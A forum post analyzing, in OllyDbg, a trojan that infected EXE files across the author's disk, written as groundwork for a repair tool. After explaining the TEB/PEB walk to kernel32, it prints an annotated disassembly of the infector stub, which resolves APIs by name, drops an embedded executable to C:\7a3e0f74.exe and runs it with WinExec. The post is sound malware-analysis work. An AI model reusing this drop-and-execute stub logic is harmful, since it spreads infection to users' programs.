宝峰科技

Views: 7748 | Replies: 4
[Original] OD analysis of a disk-wide EXE-infecting trojan, flagged by Avira (小红伞) as TR/Crypt.XPACK.Gen

    潇潇 posted on 2015-5-5 02:39:00
    A while ago I carelessly ran a packer tool, and as a result almost every EXE file outside the system drive got infected... I remember being infected once a few years ago; that time too, every EXE outside the system drive was infected, but back then an infected EXE only had to be run once in a virtual machine and it would restore the uninfected file, so after that infection, for the programs I needed I just ran the EXE in the VM first and then copied it back over the original. Actually that infection still hasn't been fully repaired to this day, because some of the tools are no longer used much. This infection feels different from the last one, and looking for a repair tool is really just wishful thinking; the usual outcome is that the AV kills everything, so I made up my mind to analyze it myself and plan to write a repair tool...
    Target file: the already-infected loaddll_木马.exe in the OD tool directory on this machine. Without further ado, straight to the point.
    Before analyzing this infected file, let's first understand and learn how to use the PEB to find the kernel32 address; that in turn requires understanding the TEB structure. First, let's get to know what the PEB and TEB are:
    PEB is short for Process Environment Block; TEB is short for Thread Environment Block. Let's look at a few structures first.

    TEB structure:
    //
    // Thread Environment Block (TEB)
    //
    typedef struct _TEB
    {
        NT_TIB Tib;                             /* 00h */
        PVOID EnvironmentPointer;               /* 1Ch */
        CLIENT_ID Cid;                          /* 20h */
        PVOID ActiveRpcHandle;                  /* 28h */
        PVOID ThreadLocalStoragePointer;        /* 2Ch */
        struct _PEB *ProcessEnvironmentBlock;   /* 30h */
        ULONG LastErrorValue;                   /* 34h */
        ULONG CountOfOwnedCriticalSections;     /* 38h */
        PVOID CsrClientThread;                  /* 3Ch */
        struct _W32THREAD* Win32ThreadInfo;     /* 40h */
        ULONG User32Reserved[0x1A];             /* 44h */
        ULONG UserReserved[5];                  /* ACh */
        PVOID WOW32Reserved;                    /* C0h */
        LCID CurrentLocale;                     /* C4h */
        ULONG FpSoftwareStatusRegister;         /* C8h */
        PVOID SystemReserved1[0x36];            /* CCh */
        LONG ExceptionCode;                     /* 1A4h */
        struct _ACTIVATION_CONTEXT_STACK *ActivationContextStackPointer; /* 1A8h */
        UCHAR SpareBytes1[0x28];                /* 1ACh */
        GDI_TEB_BATCH GdiTebBatch;              /* 1D4h */
        CLIENT_ID RealClientId;                 /* 6B4h */
        PVOID GdiCachedProcessHandle;           /* 6BCh */
        ULONG GdiClientPID;                     /* 6C0h */
        ULONG GdiClientTID;                     /* 6C4h */
        PVOID GdiThreadLocalInfo;               /* 6C8h */
        ULONG Win32ClientInfo[62];              /* 6CCh */
        PVOID glDispatchTable[0xE9];            /* 7C4h */
        ULONG glReserved1[0x1D];                /* B68h */
        PVOID glReserved2;                      /* BDCh */
        PVOID glSectionInfo;                    /* BE0h */
        PVOID glSection;                        /* BE4h */
        PVOID glTable;                          /* BE8h */
        PVOID glCurrentRC;                      /* BECh */
        PVOID glContext;                        /* BF0h */
        NTSTATUS LastStatusValue;               /* BF4h */
        UNICODE_STRING StaticUnicodeString;     /* BF8h */
        WCHAR StaticUnicodeBuffer[0x105];       /* C00h */
        PVOID DeallocationStack;                /* E0Ch */
        PVOID TlsSlots[0x40];                   /* E10h */
        LIST_ENTRY TlsLinks;                    /* F10h */
        PVOID Vdm;                              /* F18h */
        PVOID ReservedForNtRpc;                 /* F1Ch */
        PVOID DbgSsReserved[0x2];               /* F20h */
        ULONG HardErrorDisabled;                /* F28h */
        PVOID Instrumentation[14];              /* F2Ch */
        PVOID SubProcessTag;                    /* F64h */
        PVOID EtwTraceData;                     /* F68h */
        PVOID WinSockData;                      /* F6Ch */
        ULONG GdiBatchCount;                    /* F70h */
        BOOLEAN InDbgPrint;                     /* F74h */
        BOOLEAN FreeStackOnTermination;         /* F75h */
        BOOLEAN HasFiberData;                   /* F76h */
        UCHAR IdealProcessor;                   /* F77h */
        ULONG GuaranteedStackBytes;             /* F78h */
        PVOID ReservedForPerf;                  /* F7Ch */
        PVOID ReservedForOle;                   /* F80h */
        ULONG WaitingOnLoaderLock;              /* F84h */
        ULONG SparePointer1;                    /* F88h */
        ULONG SoftPatchPtr1;                    /* F8Ch */
        ULONG SoftPatchPtr2;                    /* F90h */
        PVOID *TlsExpansionSlots;               /* F94h */
        ULONG ImpersonationLocale;              /* F98h */
        ULONG IsImpersonating;                  /* F9Ch */
        PVOID NlsCache;                         /* FA0h */
        PVOID pShimData;                        /* FA4h */
        ULONG HeapVirtualAffinity;              /* FA8h */
        PVOID CurrentTransactionHandle;         /* FACh */
        PTEB_ACTIVE_FRAME ActiveFrame;          /* FB0h */
        PVOID FlsData;                          /* FB4h */
        UCHAR SafeThunkCall;                    /* FB8h */
        UCHAR BooleanSpare[3];                  /* FB9h */
    } TEB, *PTEB;

    PEB structure:
    typedef struct _PEB
    {
        UCHAR InheritedAddressSpace; // 00h
        UCHAR ReadImageFileExecOptions; // 01h
        UCHAR BeingDebugged; // 02h
        UCHAR Spare; // 03h
        PVOID Mutant; // 04h
        PVOID ImageBaseAddress; // 08h
        PPEB_LDR_DATA Ldr; // 0Ch
        PRTL_USER_PROCESS_PARAMETERS ProcessParameters; // 10h
        PVOID SubSystemData; // 14h
        PVOID ProcessHeap; // 18h
        PVOID FastPebLock; // 1Ch
        PPEBLOCKROUTINE FastPebLockRoutine; // 20h
        PPEBLOCKROUTINE FastPebUnlockRoutine; // 24h
        ULONG EnvironmentUpdateCount; // 28h
        PVOID* KernelCallbackTable; // 2Ch
        PVOID EventLogSection; // 30h
        PVOID EventLog; // 34h
        PPEB_FREE_BLOCK FreeList; // 38h
        ULONG TlsExpansionCounter; // 3Ch
        PVOID TlsBitmap; // 40h
        ULONG TlsBitmapBits[0x2]; // 44h
        PVOID ReadOnlySharedMemoryBase; // 4Ch
        PVOID ReadOnlySharedMemoryHeap; // 50h
        PVOID* ReadOnlyStaticServerData; // 54h
        PVOID AnsiCodePageData; // 58h
        PVOID OemCodePageData; // 5Ch
        PVOID UnicodeCaseTableData; // 60h
        ULONG NumberOfProcessors; // 64h
        ULONG NtGlobalFlag; // 68h
        UCHAR Spare2[0x4]; // 6Ch
        LARGE_INTEGER CriticalSectionTimeout; // 70h
        ULONG HeapSegmentReserve; // 78h
        ULONG HeapSegmentCommit; // 7Ch
        ULONG HeapDeCommitTotalFreeThreshold; // 80h
        ULONG HeapDeCommitFreeBlockThreshold; // 84h
        ULONG NumberOfHeaps; // 88h
        ULONG MaximumNumberOfHeaps; // 8Ch
        PVOID** ProcessHeaps; // 90h
        PVOID GdiSharedHandleTable; // 94h
        PVOID ProcessStarterHelper; // 98h
        PVOID GdiDCAttributeList; // 9Ch
        PVOID LoaderLock; // A0h
        ULONG OSMajorVersion; // A4h
        ULONG OSMinorVersion; // A8h
        ULONG OSBuildNumber; // ACh
        ULONG OSPlatformId; // B0h
        ULONG ImageSubSystem; // B4h
        ULONG ImageSubSystemMajorVersion; // B8h
        ULONG ImageSubSystemMinorVersion; // BCh
        ULONG ImageProcessAffinityMask; // C0h
        ULONG GdiHandleBuffer[0x22]; // C4h
        PVOID ProcessWindowStation; // ???
    } PEB, *PPEB;

    PEB_LDR_DATA structure:
    typedef struct _PEB_LDR_DATA
    {
     ULONG Length; // +0x00
     BOOLEAN Initialized; // +0x04
     PVOID SsHandle; // +0x08
     LIST_ENTRY InLoadOrderModuleList; // +0x0c
     LIST_ENTRY InMemoryOrderModuleList; // +0x14
     LIST_ENTRY InInitializationOrderModuleList;// +0x1c
    } PEB_LDR_DATA,*PPEB_LDR_DATA; // +0x24

    LIST_ENTRY structure:
    typedef struct _LIST_ENTRY {
       struct _LIST_ENTRY *Flink;
       struct _LIST_ENTRY *Blink;
    } LIST_ENTRY, *PLIST_ENTRY, *RESTRICTED_POINTER PRLIST_ENTRY;


    Based on the above, the principle for obtaining the base address of kernel32.dll is: on NT-kernel systems the fs register points to the TEB, TEB+0x30 points to the PEB, PEB+0x0c points to the PEB_LDR_DATA structure, and PEB_LDR_DATA+0x1c holds the addresses of the loaded dynamic link libraries; the first entry points to ntdll.dll and the second is the base address of kernel32.dll. In disassembly it looks like this:

    MOV EAX,DWORD PTR FS:[0x30]           ; FS points to the TEB; offset 0x30 holds the address of the PEB (Process Environment Block)
    MOV EAX,DWORD PTR DS:[EAX+0xC]           ; EAX=[7FFDE00C]=00081E90 --> base of PEB_LDR_DATA
    MOV EAX,DWORD PTR DS:[EAX+0x1C]          ; EAX=[00081EAC]=00081F28 --> InInitializationOrderModuleList, the list of modules currently loaded in the process
    MOV EAX,DWORD PTR DS:[EAX]               ; EAX=[00081F28]=00081FD0 --> Flink address
    MOV EAX,DWORD PTR DS:[EAX+0x8]           ; variable assignment: EAX=[00081FD8]=7C800000 --> base of kernel32.dll


    Key point: from now on, whenever you see assembly like MOV EAX,DWORD PTR FS:[0x30] in a disassembly, it is definitely related to the TEB and PEB; remembering this makes analysis easier.

    Next, let's analyze the infected loaddll_木马.exe. Load the target file in OD, as shown in the figure:


    00460000 >  55              PUSH EBP                                 ; After loading in OD, the infected program stops at the entry of the newly added code
    00460001    8BEC            MOV EBP,ESP
    00460003    81EC 84000000   SUB ESP,0x84
    00460009    8365 EC 00      AND DWORD PTR SS:[EBP-0x14],0x0
    0046000D    8365 B0 00      AND DWORD PTR SS:[EBP-0x50],0x0
    00460011    8365 E0 00      AND DWORD PTR SS:[EBP-0x20],0x0
    00460015    8365 F0 00      AND DWORD PTR SS:[EBP-0x10],0x0
    00460019    8365 FC 00      AND DWORD PTR SS:[EBP-0x4],0x0
    0046001D    E8 00000000     CALL 00460022                            ; Note: if you just F8 (step over) here, the trojan file is generated and infection starts, so use F7 (step into).
    00460022    58              POP EAX
    00460023    05 90020000     ADD EAX,0x290                            ; EAX=00460022 plus 0x290 gives 004602B2, the RETN address at the end of the code reached by CALL 00460022
    00460028    8945 E8         MOV DWORD PTR SS:[EBP-0x18],EAX          ; variable assignment: [0006FFA8]=004602B2
    0046002B    64:A1 30000000  MOV EAX,DWORD PTR FS:[0x30]              ; FS points to the TEB; offset 0x30 holds the address of the PEB (Process Environment Block)
    00460031    8945 D8         MOV DWORD PTR SS:[EBP-0x28],EAX          ; variable assignment: [0006FF98]=7FFDE000
    00460034    C745 C4 433A5C3>MOV DWORD PTR SS:[EBP-0x3C],0x375C3A43   ; constant assignment: [0006FF84]=0x375C3A43; starts building, at address 0006FF84, the path of a file named 7a3e0f74.exe in the root of drive C
    0046003B    C745 C8 6133653>MOV DWORD PTR SS:[EBP-0x38],0x30653361   ; constant assignment: [0006FF88]=0x30653361
    00460042    C745 CC 6637342>MOV DWORD PTR SS:[EBP-0x34],0x2E343766   ; constant assignment: [0006FF8C]=0x2E343766
    00460049    C745 D0 6578650>MOV DWORD PTR SS:[EBP-0x30],0x657865     ; constant assignment: [0006FF90]=0x657865; [0006FF84]="C:\7a3e0f74.exe"
    00460050    8B45 D8         MOV EAX,DWORD PTR SS:[EBP-0x28]          ; variable assignment: EAX=[0006FF98]=7FFDE000 --> PEB address
    00460053    8B40 0C         MOV EAX,DWORD PTR DS:[EAX+0xC]           ; EAX=[7FFDE00C]=00081E90 --> base of PEB_LDR_DATA
    00460056    8B40 1C         MOV EAX,DWORD PTR DS:[EAX+0x1C]          ; EAX=[00081EAC]=00081F28 --> InInitializationOrderModuleList, the list of modules currently loaded in the process
    00460059    8B00            MOV EAX,DWORD PTR DS:[EAX]               ; EAX=[00081F28]=00081FD0 --> Flink address
    0046005B    8945 E4         MOV DWORD PTR SS:[EBP-0x1C],EAX          ; variable assignment: [0006FFA4]=00081FD0 --> Flink address
    0046005E    8B45 E4         MOV EAX,DWORD PTR SS:[EBP-0x1C]          ; variable assignment: EAX=[0006FFA4]=00081FD0 --> Flink address
    00460061    8B40 08         MOV EAX,DWORD PTR DS:[EAX+0x8]           ; variable assignment: EAX=[00081FD8]=7C800000 --> base of kernel32.dll
    00460064    8945 F4         MOV DWORD PTR SS:[EBP-0xC],EAX           ; variable assignment: [0006FFB4]=7C800000 --> base of kernel32.dll
    00460067    8B45 E8         MOV EAX,DWORD PTR SS:[EBP-0x18]          ; EAX=[0006FFA8]=004602B2 --> fetch the function's tail address
    0046006A    C700 83C404E9   MOV DWORD PTR DS:[EAX],0xE904C483        ; [EAX]=[004602B2]=0xE904C483 --> start writing 8 bytes at this function's RETN address, so that after the trojan code has run it jumps to the uninfected program's entry
    00460070    8B45 E8         MOV EAX,DWORD PTR SS:[EBP-0x18]          ; EAX=[0006FFA8]=004602B2 --> fetch the function's tail address
    00460073    C740 04 B6FDFAF>MOV DWORD PTR DS:[EAX+0x4],0xFFFAFDB6    ; [EAX+4]=[004602B6]=0xFFFAFDB6 --> write an integer at this function's RETN address+4; the purpose is to jump to the uninfected program's entry once the trojan code has run
    0046007A    8B45 F4         MOV EAX,DWORD PTR SS:[EBP-0xC]           ; EAX=[0006FFB4]=7C800000 --> kernel32.dll address
    0046007D    8B40 3C         MOV EAX,DWORD PTR DS:[EAX+0x3C]          ; EAX=[7C80003C]=000000F0 --> [kernel32.dll+0x3C], offset of the "PE" header
    00460080    8B4D F4         MOV ECX,DWORD PTR SS:[EBP-0xC]           ; kernel32.7C800000
    00460083    8B55 F4         MOV EDX,DWORD PTR SS:[EBP-0xC]           ; kernel32.7C800000
    00460086    035401 78       ADD EDX,DWORD PTR DS:[ECX+EAX+0x78]      ; EDX=7C80262C --> kernel32.7C80262C, export table address
    0046008A    8955 DC         MOV DWORD PTR SS:[EBP-0x24],EDX          ; ntdll.KiFastSystemCallRet
    0046008D    8B45 DC         MOV EAX,DWORD PTR SS:[EBP-0x24]          ; EAX=[0006FF9C]=7C80262C (kernel32.7C80262C)
    00460090    8B4D F4         MOV ECX,DWORD PTR SS:[EBP-0xC]           ; ECX=[0006FFB4]=7C800000 (kernel32.7C800000)
    00460093    0348 1C         ADD ECX,DWORD PTR DS:[EAX+0x1C]          ; ECX=7C802654 (kernel32.7C802654) unknown
    00460096    894D BC         MOV DWORD PTR SS:[EBP-0x44],ECX
    00460099    8B45 DC         MOV EAX,DWORD PTR SS:[EBP-0x24]          ; kernel32.7C80262C
    0046009C    8B4D F4         MOV ECX,DWORD PTR SS:[EBP-0xC]           ; kernel32.7C800000
    0046009F    0348 20         ADD ECX,DWORD PTR DS:[EAX+0x20]          ; ECX=7C803538 --> function address
    004600A2    894D B4         MOV DWORD PTR SS:[EBP-0x4C],ECX
    004600A5    8B45 DC         MOV EAX,DWORD PTR SS:[EBP-0x24]          ; kernel32.7C80262C
    004600A8    8B4D F4         MOV ECX,DWORD PTR SS:[EBP-0xC]           ; kernel32.7C800000
    004600AB    0348 24         ADD ECX,DWORD PTR DS:[EAX+0x24]          ; ECX=7C80441C (kernel32.7C80441C) end of the function addresses?
    004600AE    894D B8         MOV DWORD PTR SS:[EBP-0x48],ECX
    004600B1    8365 8C 00      AND DWORD PTR SS:[EBP-0x74],0x0          ; [0006FF4C]=0
    004600B5    EB 07           JMP SHORT 004600BE                       ; 004600BE
    004600B7    8B45 8C         MOV EAX,DWORD PTR SS:[EBP-0x74]          ; start of the loop body; the loop fetches function names
    004600BA    40              INC EAX                                  ; increment by 1
    004600BB    8945 8C         MOV DWORD PTR SS:[EBP-0x74],EAX
    004600BE    8B45 DC         MOV EAX,DWORD PTR SS:[EBP-0x24]          ; i=0: EAX=[0006FF9C]=7C80262C (kernel32.7C80262C)
    004600C1    8B4D 8C         MOV ECX,DWORD PTR SS:[EBP-0x74]
    004600C4    3B48 18         CMP ECX,DWORD PTR DS:[EAX+0x18]          ; when i=0, ECX is compared with the number of export-table functions, 0x3B9; if ECX<0x3B9 there is no jump, if ECX>0x3B9 it jumps
    004600C7    0F83 61010000   JNB 0046022E                             ; 0046022E
    004600CD    8B45 8C         MOV EAX,DWORD PTR SS:[EBP-0x74]          ; when i=0, EAX=[0006FF4C]=0
    004600D0    8B4D B8         MOV ECX,DWORD PTR SS:[EBP-0x48]          ; kernel32.7C80441C
    004600D3    0FB70441        MOVZX EAX,WORD PTR DS:[ECX+EAX*2]        ; when i=0, EAX=0
    004600D7    8B4D BC         MOV ECX,DWORD PTR SS:[EBP-0x44]          ; kernel32.7C802654
    004600DA    8B55 F4         MOV EDX,DWORD PTR SS:[EBP-0xC]           ; kernel32.7C800000
    004600DD    031481          ADD EDX,DWORD PTR DS:[ECX+EAX*4]         ; when i=0, EDX=7C80A6D4 (kernel32.ActivateActCtx)
    004600E0    8955 88         MOV DWORD PTR SS:[EBP-0x78],EDX          ; ntdll.KiFastSystemCallRet
    004600E3    8B45 8C         MOV EAX,DWORD PTR SS:[EBP-0x74]          ; when i=0, EAX=[0006FF4C]=0
    004600E6    8B4D B4         MOV ECX,DWORD PTR SS:[EBP-0x4C]          ; kernel32.7C803538
    004600E9    8B55 F4         MOV EDX,DWORD PTR SS:[EBP-0xC]           ; kernel32.7C800000
    004600EC    031481          ADD EDX,DWORD PTR DS:[ECX+EAX*4]         ; when i=0, EDX=7C804B9B (kernel32.7C804B9B), ASCII "ActivateActCtx"
    004600EF    8955 84         MOV DWORD PTR SS:[EBP-0x7C],EDX          ; ntdll.KiFastSystemCallRet
    004600F2    8B45 84         MOV EAX,DWORD PTR SS:[EBP-0x7C]          ; kernel32.7C808DCB
    004600F5    8138 4765744D   CMP DWORD PTR DS:[EAX],0x4D746547        ; when i=0, [EAX]=[7C804B9B]=69746341 is compared with 0x4D746547; [EAX]>0x4D746547 so it jumps; if [EAX]=0x4D746547 it does not jump
    004600FB    75 6A           JNZ SHORT 00460167                       ; 00460167
    004600FD    8B45 84         MOV EAX,DWORD PTR SS:[EBP-0x7C]          ; when i=0x173, EAX=[0006FF44]=7C806773 (kernel32.7C806773), ASCII "GetMailslotInfo"
    00460100    8178 04 6F64756>CMP DWORD PTR DS:[EAX+0x4],0x6C75646F    ; when i=0x173, [EAX+4]=[7C806777]=736C6961; as 0x736C6961>0x6C75646F the jump is taken; when [EAX+0x4]=0x6C75646F it does not jump
    00460107    75 5E           JNZ SHORT 00460167                       ; 00460167
    00460109    8B45 84         MOV EAX,DWORD PTR SS:[EBP-0x7C]          ; passed when i=0x174, EAX=[0006FF44]=7C806783 (kernel32.7C806783), ASCII "GetModuleFileNameA"
    0046010C    8178 08 6548616>CMP DWORD PTR DS:[EAX+0x8],0x6E614865    ; when i=0x174, [EAX+8]=[7C80678B]=6C694665; as 6C694665<0x6E614865 the jump is taken; when i=0x176, [EAX+8]=[7C8067B1]=6E614865=0x6E614865, so no jump
    00460113    75 52           JNZ SHORT 00460167                       ; 00460167
    00460115    8B45 84         MOV EAX,DWORD PTR SS:[EBP-0x7C]          ; when i=0x176, EAX=[0006FF44]=7C8067A9 (kernel32.7C8067A9), ASCII "GetModuleHandleA"
    00460118    8178 0C 646C654>CMP DWORD PTR DS:[EAX+0xC],0x41656C64    ; when i=0x176, no jump
    0046011F    75 46           JNZ SHORT 00460167                       ; 00460167
    00460121    8B45 84         MOV EAX,DWORD PTR SS:[EBP-0x7C]          ; kernel32.7C808DCB
    00460124    8B40 10         MOV EAX,DWORD PTR DS:[EAX+0x10]
    00460127    25 FF000000     AND EAX,0xFF                             ; when i=0x176, EAX=0
    0046012C    75 39           JNZ SHORT 00460167                       ; when i=0x176, not taken??
    0046012E    837D EC 00      CMP DWORD PTR SS:[EBP-0x14],0x0          ; [EBP-0x14]=00000000=0x0, so no jump; on the second big loop, when i=0x176, it jumps
    00460132    75 2E           JNZ SHORT 00460162                       ; 00460162
    00460134    8B45 88         MOV EAX,DWORD PTR SS:[EBP-0x78]          ; kernel32.WriteFile
    00460137    8945 EC         MOV DWORD PTR SS:[EBP-0x14],EAX
    0046013A    C745 90 4B65726>MOV DWORD PTR SS:[EBP-0x70],0x6E72654B   ; starting at address 0006FF50, write the name Kernel32.dll
    00460141    C745 94 656C333>MOV DWORD PTR SS:[EBP-0x6C],0x32336C65
    00460148    C745 98 2E646C6>MOV DWORD PTR SS:[EBP-0x68],0x6C6C642E
    0046014F    8365 9C 00      AND DWORD PTR SS:[EBP-0x64],0x0
    00460153    8D45 90         LEA EAX,DWORD PTR SS:[EBP-0x70]          ; EAX=0006FF50, (ASCII "Kernel32.dll")
    00460156    50              PUSH EAX
    00460157    FF55 EC         CALL DWORD PTR SS:[EBP-0x14]             ; kernel32.GetModuleHandleA
    0046015A    8945 F4         MOV DWORD PTR SS:[EBP-0xC],EAX
    0046015D  ^ E9 18FFFFFF     JMP 0046007A                             ; 0046007A
    00460162    E9 A2000000     JMP 00460209                             ; 00460209
    00460167    8B45 84         MOV EAX,DWORD PTR SS:[EBP-0x7C]          ; kernel32.7C808DCB
    0046016A    8138 43726561   CMP DWORD PTR DS:[EAX],0x61657243        ; when i=0x173, [EAX]=[7C806773]=4D746547; as 0x4D746547<0x61657243 the jump is taken
    00460170    75 20           JNZ SHORT 00460192                       ; 00460192
    00460172    8B45 84         MOV EAX,DWORD PTR SS:[EBP-0x7C]          ; kernel32.7C808DCB
    00460175    8178 04 7465466>CMP DWORD PTR DS:[EAX+0x4],0x69466574
    0046017C    75 14           JNZ SHORT 00460192                       ; 00460192
    0046017E    8B45 84         MOV EAX,DWORD PTR SS:[EBP-0x7C]          ; passed on the second big loop when i=0x4D, EAX=[0006FF44]=7C805143 (kernel32.7C805143), ASCII "CreateFiber"
    00460181    8178 08 6C65410>CMP DWORD PTR DS:[EAX+0x8],0x41656C
    00460188    75 08           JNZ SHORT 00460192                       ; 00460192
    0046018A    8B45 88         MOV EAX,DWORD PTR SS:[EBP-0x78]          ; passed on the second big loop when i=0x4F, EAX=[0006FF48]=7C801A28 (kernel32.CreateFileA)
    0046018D    8945 B0         MOV DWORD PTR SS:[EBP-0x50],EAX
    00460190    EB 77           JMP SHORT 00460209                       ; 00460209
    00460192    8B45 84         MOV EAX,DWORD PTR SS:[EBP-0x7C]          ; kernel32.7C808DCB
    00460195    8138 57726974   CMP DWORD PTR DS:[EAX],0x74697257        ; when i=0, [EAX]=[7C804B9B]=69746341 < 0x74697257, jump
    0046019B    75 24           JNZ SHORT 004601C1                       ; 004601C1
    0046019D    8B45 84         MOV EAX,DWORD PTR SS:[EBP-0x7C]          ; kernel32.7C808DCB
    004601A0    8178 04 6546696>CMP DWORD PTR DS:[EAX+0x4],0x6C694665
    004601A7    75 18           JNZ SHORT 004601C1                       ; 004601C1
    004601A9    8B45 84         MOV EAX,DWORD PTR SS:[EBP-0x7C]          ; on the second big loop when i=0x38F, EAX=[0006FF44]=7C808DCB (kernel32.7C808DCB), ASCII "WriteFile"
    004601AC    8B40 08         MOV EAX,DWORD PTR DS:[EAX+0x8]
    004601AF    25 FFFF0000     AND EAX,0xFFFF
    004601B4    83F8 65         CMP EAX,0x65                             ; on the second big loop when i=0x38F, EAX=0x65, so no jump
    004601B7    75 08           JNZ SHORT 004601C1                       ; 004601C1
    004601B9    8B45 88         MOV EAX,DWORD PTR SS:[EBP-0x78]          ; kernel32.WriteFile
    004601BC    8945 E0         MOV DWORD PTR SS:[EBP-0x20],EAX
    004601BF    EB 48           JMP SHORT 00460209                       ; 00460209
    004601C1    8B45 84         MOV EAX,DWORD PTR SS:[EBP-0x7C]          ; kernel32.7C808DCB
    004601C4    8138 436C6F73   CMP DWORD PTR DS:[EAX],0x736F6C43        ; when i=0, [EAX]=[7C804B9B]=69746341 < 0x736F6C43, jump
    004601CA    75 20           JNZ SHORT 004601EC                       ; 004601EC
    004601CC    8B45 84         MOV EAX,DWORD PTR SS:[EBP-0x7C]          ; kernel32.7C808DCB
    004601CF    8178 04 6548616>CMP DWORD PTR DS:[EAX+0x4],0x6E614865    ; passed on the second big loop
    004601D6    75 14           JNZ SHORT 004601EC                       ; 004601EC
    004601D8    8B45 84         MOV EAX,DWORD PTR SS:[EBP-0x7C]          ; kernel32.7C808DCB
    004601DB    8178 08 646C650>CMP DWORD PTR DS:[EAX+0x8],0x656C64
    004601E2    75 08           JNZ SHORT 004601EC                       ; 004601EC
    004601E4    8B45 88         MOV EAX,DWORD PTR SS:[EBP-0x78]          ; kernel32.WriteFile
    004601E7    8945 F0         MOV DWORD PTR SS:[EBP-0x10],EAX
    004601EA    EB 1D           JMP SHORT 00460209                       ; 00460209
    004601EC    8B45 84         MOV EAX,DWORD PTR SS:[EBP-0x7C]          ; kernel32.7C808DCB
    004601EF    8138 57696E45   CMP DWORD PTR DS:[EAX],0x456E6957        ; when i=0, [EAX]=[7C804B9B]=69746341 > 0x456E6957, jump
    004601F5    75 12           JNZ SHORT 00460209                       ; 00460209
    004601F7    8B45 84         MOV EAX,DWORD PTR SS:[EBP-0x7C]          ; on the second big loop when i=0x383, EAX=[0006FF44]=7C808CD7 (kernel32.7C808CD7), ASCII "WinExec"
    004601FA    8178 04 7865630>CMP DWORD PTR DS:[EAX+0x4],0x636578      ; on the second big loop when i=0x383, [EAX+4]=[7C808CDB]=00636578 equals the compared value, so no jump
    00460201    75 06           JNZ SHORT 00460209                       ; 00460209
    00460203    8B45 88         MOV EAX,DWORD PTR SS:[EBP-0x78]          ; kernel32.WriteFile
    00460206    8945 FC         MOV DWORD PTR SS:[EBP-0x4],EAX
    00460209    837D EC 00      CMP DWORD PTR SS:[EBP-0x14],0x0          ; jumps when [0006FFAC] equals 0; on the second big loop, [0006FFAC]=7C80B731 (kernel32.GetModuleHandleA)
    0046020D    74 1A           JE SHORT 00460229                        ; 00460229
    0046020F    837D B0 00      CMP DWORD PTR SS:[EBP-0x50],0x0          ; at the start of the second loop, [0006FF70]=7C801A28 (kernel32.CreateFileA)
    00460213    74 14           JE SHORT 00460229                        ; 00460229
    00460215    837D E0 00      CMP DWORD PTR SS:[EBP-0x20],0x0          ; on the second big loop, [0006FFA0]=7C810E17 (kernel32.WriteFile)
    00460219    74 0E           JE SHORT 00460229                        ; 00460229
    0046021B    837D F0 00      CMP DWORD PTR SS:[EBP-0x10],0x0          ; on the second big loop, [0006FFB0]=7C809BD7 (kernel32.CloseHandle)
    0046021F    74 08           JE SHORT 00460229                        ; 00460229
    00460221    837D FC 00      CMP DWORD PTR SS:[EBP-0x4],0x0           ; on the second big loop, when i=0x38F, [0006FFBC]=7C8623AD (kernel32.WinExec)
    00460225    74 02           JE SHORT 00460229                        ; 00460229
    00460227    EB 05           JMP SHORT 0046022E                       ; 0046022E
    00460229  ^ E9 89FEFFFF     JMP 004600B7                             ; end of loop
    0046022E    6A 00           PUSH 0x0                                 ; on the second big loop when i=0x38F: start creating the trojan file
    00460230    68 80000000     PUSH 0x80
    00460235    6A 02           PUSH 0x2
    00460237    6A 00           PUSH 0x0
    00460239    6A 00           PUSH 0x0
    0046023B    68 000000C0     PUSH 0xC0000000
    00460240    8D45 C4         LEA EAX,DWORD PTR SS:[EBP-0x3C]          ; EAX=0006FF84, (ASCII "C:\7a3e0f74.exe")
    00460243    50              PUSH EAX                                 ; push EAX=0006FF84, (ASCII "C:\7a3e0f74.exe")
    00460244    FF55 B0         CALL DWORD PTR SS:[EBP-0x50]             ; kernel32.CreateFileA
    00460247    8945 C0         MOV DWORD PTR SS:[EBP-0x40],EAX          ; EAX=00000034
    0046024A    837D C0 FF      CMP DWORD PTR SS:[EBP-0x40],-0x1
    0046024E    74 61           JE SHORT 004602B1                        ; if the trojan file 7a3e0f74.exe was created successfully, no jump
    00460250    8B45 E8         MOV EAX,DWORD PTR SS:[EBP-0x18]          ; tail address of the trojan-file-creating function, EAX=[0006FFA8]=004602B2 (loaddll_.004602B2)
    00460253    8945 80         MOV DWORD PTR SS:[EBP-0x80],EAX
    00460256    83A5 7CFFFFFF 0>AND DWORD PTR SS:[EBP-0x84],0x0
    0046025D    EB 0D           JMP SHORT 0046026C                       ; 0046026C
    0046025F    8B85 7CFFFFFF   MOV EAX,DWORD PTR SS:[EBP-0x84]          ; loop start
    00460265    40              INC EAX
    00460266    8985 7CFFFFFF   MOV DWORD PTR SS:[EBP-0x84],EAX
    0046026C    81BD 7CFFFFFF F>CMP DWORD PTR SS:[EBP-0x84],0x1F4        ; if [EBP-0x84]<0x1F4, no jump
    00460276    7D 39           JGE SHORT 004602B1                       ; 004602B1
    00460278    8B45 80         MOV EAX,DWORD PTR SS:[EBP-0x80]          ; loaddll_.004602BA
    0046027B    8138 4D5A9000   CMP DWORD PTR DS:[EAX],0x905A4D          ; [EAX]=[004602B2]=E904C483 is compared with 0x905A4D; I won't write more here, it simply does not jump once they are equal; when i=8, [EAX]=[004602BA]=00905A4D equals the compared value, so no jump
    00460281    75 25           JNZ SHORT 004602A8                       ; 004602A8
    00460283    6A 00           PUSH 0x0                                 ; from here it starts writing data into the trojan file it created
    00460285    8D45 F8         LEA EAX,DWORD PTR SS:[EBP-0x8]           ; EAX=0006FFB8
    00460288    50              PUSH EAX
    00460289    68 004C0100     PUSH 0x14C00
    0046028E    FF75 80         PUSH DWORD PTR SS:[EBP-0x80]             ; loaddll_.004602BA
    00460291    FF75 C0         PUSH DWORD PTR SS:[EBP-0x40]             ; handle of the created file, 0x34
    00460294    FF55 E0         CALL DWORD PTR SS:[EBP-0x20]             ; kernel32.WriteFile
    00460297    FF75 C0         PUSH DWORD PTR SS:[EBP-0x40]             ; trojan file handle; after the write, the next line closes it
    0046029A    FF55 F0         CALL DWORD PTR SS:[EBP-0x10]             ; kernel32.CloseHandle
    0046029D    6A 05           PUSH 0x5                                 ; Pay close attention from here on: this is where the created trojan file gets run; of course I won't execute it, since I'm analyzing on a physical machine
    0046029F    8D45 C4         LEA EAX,DWORD PTR SS:[EBP-0x3C]          ; EAX=0006FF84, (ASCII "C:\7a3e0f74.exe") ========> the code below is not executed, otherwise the EXE files get infected all over again!!!!!!!!!
    004602A2    50              PUSH EAX                                 ; push EAX=0006FF84, (ASCII "C:\7a3e0f74.exe")
    004602A3    FF55 FC         CALL DWORD PTR SS:[EBP-0x4]              ; kernel32.WinExec
    004602A6    EB 09           JMP SHORT 004602B1                       ; 004602B1
